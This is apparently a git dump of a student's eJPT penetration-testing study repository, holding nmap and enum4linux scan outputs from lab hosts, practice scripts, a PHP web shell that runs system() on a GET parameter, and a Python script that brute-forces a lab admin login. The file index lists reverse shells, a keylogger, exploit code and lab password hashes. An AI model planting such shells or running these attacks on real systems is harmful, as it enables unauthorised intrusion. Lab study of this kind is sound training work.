[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]
[+] Getting builtin group memberships:
Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
[+] Getting local groups:
group:[HelpServicesGroup] rid:[0x3e9]
[+] Getting local group memberships:
Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0
[+] Getting domain groups:
group:[None] rid:[0x201]
[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
Group 'None' (RID: 513) has member: ELS-WINXP\Guest
Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
Group 'None' (RID: 513) has member: ELS-WINXP\eLS
Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
Group 'None' (RID: 513) has member: ELS-WINXP\Frank
=========================================================================
| Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-823518204-2025429265-839522115
[+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
===============================================
| Getting printer info for 192.168.99.162 |
===============================================
No printers returned.
enum4linux complete on Sun Feb 21 17:25:39 2021
================================================
FILE: ine-labs/null-session/nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Sun Feb 21 17:08:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt
Nmap scan report for 192.168.99.100
Host is up (0.00023s latency).
All 1000 scanned ports on 192.168.99.100 are closed
Nmap scan report for 192.168.99.162
Host is up (0.058s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 21 17:08:41 2021 -- 2 IP addresses (2 hosts up) scanned in 8.95 seconds
================================================
FILE: ine-labs/practice/hello.php
================================================
<html>
<head>
<title>Test PHP</title>
</head>
<body>
<?php echo '<p> Hello World!</p>'; ?>
</body>
</html>
================================================
FILE: ine-labs/practice/index.html
================================================
<html>
<head>
<title>Test PHP</title>
</head>
<body>
<p>
Welcome to my custom web server!
</p>
</body>
</html>
================================================
FILE: ine-labs/practice/my-ls.sh
================================================
#!/bin/bash
for i in $(ls); do
echo "item: $i"
done
================================================
FILE: ine-labs/practice/script.sh
================================================
#!/bin/bash
x=444
y=321
if [ "$x" -eq "$y" ]; then
echo "The values are equal!";
elif [ "$x" -lt "$y" ]; then
echo "$x is less than $y"
else
echo "$x is greater than $y"
fi
================================================
FILE: ine-labs/practice/sequences.sh
================================================
#!/bin/bash
echo "Two ways to iterate over a sequence of numbers!"
echo "option 1: use the seq command"
for i in $(seq 1 10); do
echo "$i";
done
echo "option 2: use built-in braces {1..10}"
for i in {1..10}; do
echo "$i";
done
================================================
FILE: ine-labs/practice/shell.php
================================================
<html>
<head>
<title>Simple PHP Shell</title>
</head>
<body>
<!-- Simple text form to enter commands -->
<form>
<input type="text" name="cmd" />
<input type="submit" value="Enter" />
</form>
<!-- Execute the commands -->
<?php system($_GET["cmd"])?>
</body>
</html>
================================================
FILE: ine-labs/python-assisted-exploitation/brute-forcer.py
================================================
from bs4 import BeautifulSoup
import requests
def get_html(url):
response = requests.get(url)
html = response.text
return html
def parse_ids(html, id_name):
"""
Given HTML code, returns a list of values that have the id `id_name`.
"""
result = []
soup = BeautifulSoup(html, "html.parser")
for item in soup.find_all(id=id_name):
result.append(item.contents[0])
# Remove an duplicate entries
result = list(set(result))
return result
def attack():
# Scrape website for employee names and departments
html = get_html("http://172.16.120.120")
target = "http://172.16.120.120/admin.php"
names = parse_ids(html, "name")
departments = parse_ids(html, "department")
# Attempt to login to "Admin Area" with name:department credential pair
for name in names:
for department in departments:
response = requests.get(target, auth=(name, department))
if response.status_code != 401:
print(f"Found successful login {name}:{department}")
return
if __name__ == "__main__":
attack()
================================================
FILE: ine-labs/scanning-and-os-fingerprinting/fping_scan.txt
================================================
10.142.111.1
10.142.111.6
10.142.111.48
10.142.111.96
10.142.111.99
10.142.111.100
10.142.111.240
================================================
FILE: ine-labs/scanning-and-os-fingerprinting/nmap_ping_scan.txt
================================================
# Nmap 7.91 scan initiated Wed Feb 17 22:20:54 2021 as: nmap -sn -oN nmap_ping_scan.txt 10.142.111.*
Nmap scan report for 10.142.111.1
Host is up (0.056s latency).
Nmap scan report for 10.142.111.6
Host is up (0.057s latency).
Nmap scan report for 10.142.111.48
Host is up (0.057s latency).
Nmap scan report for 10.142.111.96
Host is up (0.056s latency).
Nmap scan report for 10.142.111.99
Host is up (0.056s latency).
Nmap scan report for 10.142.111.100
Host is up (0.056s latency).
Nmap scan report for 10.142.111.213
Host is up (0.060s latency).
Nmap scan report for 10.142.111.240
Host is up (0.024s latency).
# Nmap done at Wed Feb 17 22:20:57 2021 -- 256 IP addresses (8 hosts up) scanned in 3.23 seconds
================================================
FILE: ine-labs/scanning-and-os-fingerprinting/nmap_syn_scan.txt
================================================
# Nmap 7.91 scan initiated Wed Feb 17 22:22:53 2021 as: nmap -sS -iL fping_scan.txt -oN nmap_syn_scan.txt
Nmap scan report for 10.142.111.1
Host is up (0.057s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
MAC Address: 00:50:56:A0:23:42 (VMware)
Nmap scan report for 10.142.111.6
Host is up (0.055s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:50:56:A0:B1:71 (VMware)
Nmap scan report for 10.142.111.48
Host is up (0.056s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
MAC Address: 00:50:56:A0:57:E5 (VMware)
Nmap scan report for 10.142.111.96
Host is up (0.057s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:50:56:A0:1C:4F (VMware)
Nmap scan report for 10.142.111.99
Host is up (0.063s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
MAC Address: 00:50:56:A0:E5:3E (VMware)
Nmap scan report for 10.142.111.100
Host is up (0.056s latency).
All 1000 scanned ports on 10.142.111.100 are closed
MAC Address: 00:50:56:A0:1C:4F (VMware)
Nmap scan report for 10.142.111.240
Host is up (0.000020s latency).
All 1000 scanned ports on 10.142.111.240 are closed
# Nmap done at Wed Feb 17 22:23:07 2021 -- 7 IP addresses (7 hosts up) scanned in 14.32 seconds
================================================
FILE: ine-labs/scanning-and-os-fingerprinting/nmap_version_and_os.txt
================================================
# Nmap 7.91 scan initiated Wed Feb 17 22:24:04 2021 as: nmap -O -sV -iL fping_scan.txt -oN nmap_version_and_os.txt
Nmap scan report for 10.142.111.1
Host is up (0.055s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)
53/tcp open domain dnsmasq 2.55
80/tcp open http lighttpd 1.4.29
MAC Address: 00:50:56:A0:23:42 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|media device
Running (JUST GUESSING): OpenBSD 4.X|3.X|5.X (94%), FreeBSD 7.X|9.X (87%), Comau embedded (86%), Apple Apple TV 5.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:7.0 cpe:/o:openbsd:openbsd:3 cpe:/o:openbsd:openbsd:4 cpe:/a:apple:apple_tv:5.2.1 cpe:/a:apple:apple_tv:5.3 cpe:/o:freebsd:freebsd:9.1
Aggressive OS guesses: OpenBSD 4.3 (94%), FreeBSD 7.0-RELEASE (87%), Comau C4G robot control unit (86%), OpenBSD 3.8 - 4.7 (85%), OpenBSD 4.1 (85%), OpenBSD 4.9 - 5.1 (85%), OpenBSD 5.2 (85%), Apple TV 5.2.1 or 5.3 (85%), FreeBSD 9.1-PRERELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Nmap scan report for 10.142.111.6
Host is up (0.054s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
MAC Address: 00:50:56:A0:27:7E (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/17%OT=22%CT=1%CU=39056%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW2%O2=M4E7ST11NW2%O3=M4E7NNT11NW2%O4=M4E7ST11NW2%O
OS:5=M4E7ST11NW2%O6=M4E7ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6
OS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M4E7NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.142.111.48
Host is up (0.056s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
MAC Address: 00:50:56:A0:57:E5 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/17%OT=135%CT=1%CU=39985%PV=Y%DS=1%DC=D%G=Y%M=005056%
OS:TM=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%CI=I%II=I
OS:%SS=S%TS=0)OPS(O1=M4E7NW0NNT00NNS%O2=M4E7NW0NNT00NNS%O3=M4E7NW0NNT00%O4=
OS:M4E7NW0NNT00NNS%O5=M4E7NW0NNT00NNS%O6=M4E7NNT00NNS)WIN(W1=FFFF%W2=FFFF%W
OS:3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M4E7NW0NNS%CC=
OS:N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S
OS:%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FFFF%S=O%A=S+%F=AS%O=M4E7NW0NNT00NNS
OS:%RD=0%Q=)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T
OS:7(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Nmap scan report for 10.142.111.96
Host is up (0.055s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
MAC Address: 00:50:56:A0:1C:4F (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/17%OT=80%CT=1%CU=40537%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=602DDDF5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW2%O2=M4E7ST11NW2%O3=M4E7NNT11NW2%O4=M4E7ST11NW2%O
OS:5=M4E7ST11NW2%O6=M4E7ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6
OS:=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M4E7NNSNW2%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
Nmap scan report for 10.142.111.99
Host is up (0.056s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)
53/tcp open domain dnsmasq 2.55
80/tcp open http lighttpd 1.4.29
MAC Address: 00:50:56:A0:E5:3E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|media device
Running (JUST GUESSING): OpenBSD 4.X|3.X|5.X (94%), Comau embedded (86%), FreeBSD 7.X|9.X (86%), Apple Apple TV 5.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3 cpe:/o:freebsd:freebsd:7.0 cpe:/o:openbsd:openbsd:3 cpe:/o:openbsd:openbsd:4 cpe:/a:apple:apple_tv:5.2.1 cpe:/a:apple:apple_tv:5.3 cpe:/o:freebsd:freebsd:9.1
Aggressive OS guesses: OpenBSD 4.3 (94%), Comau C4G robot control unit (86%), FreeBSD 7.0-RELEASE (86%), OpenBSD 3.8 - 4.7 (85%), OpenBSD 4.9 - 5.1 (85%), OpenBSD 5.2 (85%), Apple TV 5.2.1 or 5.3 (85%), FreeBSD 9.1-PRERELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Nmap scan report for 10.142.111.100
Host is up (0.055s latency).
All 1000 scanned ports on 10.142.111.100 are closed
MAC Address: 00:50:56:A0:1C:4F (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Nmap scan report for 10.142.111.240
Host is up (0.000058s latency).
All 1000 scanned ports on 10.142.111.240 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 22:24:38 2021 -- 7 IP addresses (7 hosts up) scanned in 35.93 seconds
================================================
FILE: scripts/eEnum.sh
================================================
#!/bin/bash
# A wrapper for fping and nmap to help automate the host enumeration.
TARGET=$1
HOST_FILE="alive_hosts.txt"
OUT_FILE="nmap_scan.txt"
print_usage()
{
echo "Usage: $0 <TARGET range>"
}
scan()
{
echo "++ starting fping scan ++"
fping -a -g $TARGET 2>/dev/null | tee $HOST_FILE;
echo ""
echo "++ starting nmap scan ++"
sudo nmap -p- -A -T4 -iL $HOST_FILE -oN $OUT_FILE;
}
if [ -z "$TARGET" ]; then
print_usage
exit 1
fi
scan
gitextract_f6pnax8e/
├── LICENSE
├── README.md
├── cheat-sheet.md
├── ine-labs/
│ ├── arp-poisoning/
│ │ ├── alive_hosts.txt
│ │ └── nmap_scan.txt
│ ├── black-box1/
│ │ ├── alive_hosts.txt
│ │ ├── dot101_DONE/
│ │ │ ├── README.md
│ │ │ ├── default-passwords.txt
│ │ │ ├── default-users.txt
│ │ │ └── passwd
│ │ ├── dot140_done/
│ │ │ ├── dirb_scan2.txt
│ │ │ ├── sdadas.txt
│ │ │ └── test1.txt
│ │ ├── dot199/
│ │ │ ├── enum4linux.txt
│ │ │ └── nmap_scan.txt
│ │ ├── id_rsa.pub
│ │ ├── initial_nmap_scan.txt
│ │ ├── possible-usernames.txt
│ │ └── thorough_nmap_scan.txt
│ ├── black-box2/
│ │ ├── alive_hosts.txt
│ │ ├── dot166_DONE/
│ │ │ ├── dirb_scan.txt
│ │ │ ├── for_hydra.txt
│ │ │ └── names.txt
│ │ ├── dot81_DONE/
│ │ │ ├── dirb_scan.txt
│ │ │ └── users.bak
│ │ ├── dot91/
│ │ │ ├── dirb_scan.txt
│ │ │ ├── gobuster_foocorp_scan.txt
│ │ │ ├── gobuster_foocorp_scan2.txt
│ │ │ ├── gobuster_scan.txt
│ │ │ ├── myapp.html
│ │ │ └── php-reverse-shell.php
│ │ ├── dot92_DONE/
│ │ │ ├── dirb_scan.txt
│ │ │ └── user-hashes.txt
│ │ └── thorough_nmap_scan.txt
│ ├── black-box3/
│ │ ├── alive_hosts.txt
│ │ ├── dot220/
│ │ │ └── gobuster_scan.txt
│ │ ├── dot234/
│ │ │ ├── for_john.txt
│ │ │ ├── gobuster_scan.txt
│ │ │ ├── index.php
│ │ │ ├── revshell.php
│ │ │ └── scan_xyz.txt
│ │ └── thorough_nmap_scan.txt
│ ├── bruteforce-and-password-cracking/
│ │ ├── alive_hosts.txt
│ │ ├── for_john.txt
│ │ ├── nmap_scan.txt
│ │ ├── passwd
│ │ └── shadow
│ ├── dirbuster/
│ │ ├── alive_hosts.txt
│ │ └── nmap_scan.txt
│ ├── exploit-based-cpp/
│ │ ├── exploit.cpp
│ │ └── keylogger.cpp
│ ├── metasploit/
│ │ ├── README.md
│ │ ├── hashdump.txt
│ │ └── nmap_scan.txt
│ ├── nessus/
│ │ └── nmap_scan.txt
│ ├── null-session/
│ │ ├── Congratulations.txt
│ │ ├── alive_hosts.txt
│ │ ├── enum4linux_scan.txt
│ │ └── nmap_scan.txt
│ ├── practice/
│ │ ├── hello.php
│ │ ├── index.html
│ │ ├── my-ls.sh
│ │ ├── script.sh
│ │ ├── sequences.sh
│ │ └── shell.php
│ ├── python-assisted-exploitation/
│ │ └── brute-forcer.py
│ └── scanning-and-os-fingerprinting/
│ ├── fping_scan.txt
│ ├── nmap_ping_scan.txt
│ ├── nmap_syn_scan.txt
│ └── nmap_version_and_os.txt
└── scripts/
└── eEnum.sh
SYMBOL INDEX (10 symbols across 5 files)
FILE: ine-labs/black-box2/dot91/php-reverse-shell.php
function printit (line 183) | function printit ($string) {
FILE: ine-labs/black-box3/dot234/revshell.php
function printit (line 183) | function printit ($string) {
FILE: ine-labs/exploit-based-cpp/exploit.cpp
function SOCKET (line 13) | SOCKET InitServer()
function SendData (line 54) | void SendData(SOCKET sockfd, char *buf)
function SendUserDirectory (line 66) | int SendUserDirectory(SOCKET sockfd, const char *dirname)
function main (line 86) | int main()
FILE: ine-labs/exploit-based-cpp/keylogger.cpp
function main (line 11) | int main()
FILE: ine-labs/python-assisted-exploitation/brute-forcer.py
function get_html (line 4) | def get_html(url):
function parse_ids (line 9) | def parse_ids(html, id_name):
function attack (line 23) | def attack():
Condensed preview — 71 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (138K chars).
[
{
"path": "LICENSE",
"chars": 1069,
"preview": "MIT License\n\nCopyright (c) 2022 Jason Turley\n\nPermission is hereby granted, free of charge, to any person obtaining a co"
},
{
"path": "README.md",
"chars": 212,
"preview": "# eJPT\n\nMy notes and lab solutions from studying for the eLearnSecurity Junior Penetration Tester certificate.\n\n## Cheat"
},
{
"path": "cheat-sheet.md",
"chars": 4661,
"preview": "# Cheat Sheet\n\nThis cheat sheet is a list of commands to help with the black box\npen test engagements. \n\n## Networking\n\n"
},
{
"path": "ine-labs/arp-poisoning/alive_hosts.txt",
"chars": 40,
"preview": "10.100.13.36\n10.100.13.37\n10.100.13.140\n"
},
{
"path": "ine-labs/arp-poisoning/nmap_scan.txt",
"chars": 932,
"preview": "# Nmap 7.91 scan initiated Sun Feb 21 18:21:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt\nNmap scan report "
},
{
"path": "ine-labs/black-box1/alive_hosts.txt",
"chars": 56,
"preview": "172.16.64.101\n172.16.64.140\n172.16.64.182\n172.16.64.199\n"
},
{
"path": "ine-labs/black-box1/dot101_DONE/README.md",
"chars": 844,
"preview": "# Apache Tomcat Webserver\n\n## Recon\nRunning gobuster shows hidden /manager directory that requires a username and passwo"
},
{
"path": "ine-labs/black-box1/dot101_DONE/default-passwords.txt",
"chars": 89,
"preview": "admin\ntomcat\npassword\npassword1\nPassword1\nmanager\nroot\ntoor\nr00t\ns3cret\nrole1\nchangethis\n"
},
{
"path": "ine-labs/black-box1/dot101_DONE/default-users.txt",
"chars": 37,
"preview": "admin\nroot\ntomcat\nrole\nrole1\nmanager\n"
},
{
"path": "ine-labs/black-box1/dot101_DONE/passwd",
"chars": 2345,
"preview": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys"
},
{
"path": "ine-labs/black-box1/dot140_done/dirb_scan2.txt",
"chars": 1418,
"preview": "\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan2.txt\nSTART_TIME: Wed Feb 2"
},
{
"path": "ine-labs/black-box1/dot140_done/sdadas.txt",
"chars": 126,
"preview": "Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin;\n/var/www/html/project/354253425234234/fla"
},
{
"path": "ine-labs/black-box1/dot140_done/test1.txt",
"chars": 96,
"preview": "https://stackoverflow.com/questions/1134319/difference-between-a-user-and-a-login-in-sql-server\n"
},
{
"path": "ine-labs/black-box1/dot199/enum4linux.txt",
"chars": 1232,
"preview": "Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 24 12:24:59 2021\n\n ======"
},
{
"path": "ine-labs/black-box1/dot199/nmap_scan.txt",
"chars": 774,
"preview": "# Nmap 7.91 scan initiated Wed Feb 24 12:18:57 2021 as: nmap -sV --reason -oN nmap_scan.txt 172.16.64.199\nNmap scan repo"
},
{
"path": "ine-labs/black-box1/id_rsa.pub",
"chars": 632,
"preview": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAlGWzjgKVHcpaDFvc6877t6ZT2ArQa+OiFteRLCc6TpxJ/lQFEDtmxjTcotik7V3DcYrIv3UsmNLjxKpEJpwq"
},
{
"path": "ine-labs/black-box1/initial_nmap_scan.txt",
"chars": 5473,
"preview": "# Nmap 7.91 scan initiated Tue Feb 23 21:45:06 2021 as: nmap -sV -O -iL alive_hosts.txt -oN initial_nmap_scan.txt\nNmap s"
},
{
"path": "ine-labs/black-box1/possible-usernames.txt",
"chars": 77,
"preview": "elsadmin\nadminels\nelsuser\ndeveloper\ntomcat\nmanager\nroot\nadmin\ndummy\nnao12023\n"
},
{
"path": "ine-labs/black-box1/thorough_nmap_scan.txt",
"chars": 10148,
"preview": "# Nmap 7.91 scan initiated Wed Feb 24 13:41:35 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN tho"
},
{
"path": "ine-labs/black-box2/alive_hosts.txt",
"chars": 53,
"preview": "172.16.64.81\n172.16.64.91\n172.16.64.92\n172.16.64.166\n"
},
{
"path": "ine-labs/black-box2/dot166_DONE/dirb_scan.txt",
"chars": 1163,
"preview": "\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan.txt\nSTART_TIME: Wed Feb 24"
},
{
"path": "ine-labs/black-box2/dot166_DONE/for_hydra.txt",
"chars": 345,
"preview": "Admin\nElizabeth\nElizabeth.Lopez\nelizabeth\nelizabeth.lopez\nTara\nTara.Backer\ntara\ntara.baker\nBecky\nBecky.Casey\nbecky\nbecky"
},
{
"path": "ine-labs/black-box2/dot166_DONE/names.txt",
"chars": 113,
"preview": "Elizabeth Lopez\nTara Baker\nBecky Casey\nRandy Carlson\nPablo Roberts\nBessie Hammond\nGerardo Malone\nSabrina Summers\n"
},
{
"path": "ine-labs/black-box2/dot81_DONE/dirb_scan.txt",
"chars": 2908,
"preview": "----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan.txt\nSTART_TIME: Wed Feb 24 1"
},
{
"path": "ine-labs/black-box2/dot81_DONE/users.bak",
"chars": 46,
"preview": "john1:password123\npeter:youdonotguessthatone5\n"
},
{
"path": "ine-labs/black-box2/dot91/dirb_scan.txt",
"chars": 512,
"preview": "\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan.txt\nSTART_TIME: Thu Feb 25"
},
{
"path": "ine-labs/black-box2/dot91/gobuster_foocorp_scan.txt",
"chars": 749,
"preview": "\n=====================================================\nGobuster v2.0.1 OJ Reeves (@TheColonial)\n==========="
},
{
"path": "ine-labs/black-box2/dot91/gobuster_foocorp_scan2.txt",
"chars": 744,
"preview": "\n=====================================================\nGobuster v2.0.1 OJ Reeves (@TheColonial)\n==========="
},
{
"path": "ine-labs/black-box2/dot91/gobuster_scan.txt",
"chars": 711,
"preview": "\n=====================================================\nGobuster v2.0.1 OJ Reeves (@TheColonial)\n==========="
},
{
"path": "ine-labs/black-box2/dot91/myapp.html",
"chars": 469,
"preview": "<html><body style=\"background: black; color: white;\">\n<center><div style=\"border: 1px yellow double\">\n<br /><br />\n<form"
},
{
"path": "ine-labs/black-box2/dot91/php-reverse-shell.php",
"chars": 5494,
"preview": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net"
},
{
"path": "ine-labs/black-box2/dot92_DONE/dirb_scan.txt",
"chars": 915,
"preview": "\n-----------------\nDIRB v2.22 \nBy The Dark Raver\n-----------------\n\nOUTPUT_FILE: dirb_scan.txt\nSTART_TIME: Wed Feb 24"
},
{
"path": "ine-labs/black-box2/dot92_DONE/user-hashes.txt",
"chars": 66,
"preview": "c5d71f305bb017a66c5fa7fd66535b84\n14d69ee186f8d9bbeddd4da31559ce0f\n"
},
{
"path": "ine-labs/black-box2/thorough_nmap_scan.txt",
"chars": 8590,
"preview": "# Nmap 7.91 scan initiated Wed Feb 24 18:44:11 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN tho"
},
{
"path": "ine-labs/black-box3/alive_hosts.txt",
"chars": 40,
"preview": "172.16.37.1\n172.16.37.220\n172.16.37.234\n"
},
{
"path": "ine-labs/black-box3/dot220/gobuster_scan.txt",
"chars": 737,
"preview": "\n=====================================================\nGobuster v2.0.1 OJ Reeves (@TheColonial)\n==========="
},
{
"path": "ine-labs/black-box3/dot234/for_john.txt",
"chars": 249,
"preview": "elsuser:$6$MGsPjrt7$hBUzryEWeYdgKvj4MO0v7y0JJ6TxH1oXw4vHCXzG5kZOv8i4ejvbXUM3jkBuymRet9jfQ53hU806p8ujcuuQr1:17515:0:99999"
},
{
"path": "ine-labs/black-box3/dot234/gobuster_scan.txt",
"chars": 144,
"preview": "/.htaccess (Status: 403)\n/.hta (Status: 403)\n/.htpasswd (Status: 403)\n/index.html (Status: 200)\n/server-status (Status: "
},
{
"path": "ine-labs/black-box3/dot234/index.php",
"chars": 89,
"preview": "<?php\n\necho \"<!-- cmd: \" . $_GET[\"cmd\"] . \"-->\";\necho \"<hr />\";\n\nsystem(\"ifconfig\");\n\n?>\n"
},
{
"path": "ine-labs/black-box3/dot234/revshell.php",
"chars": 5493,
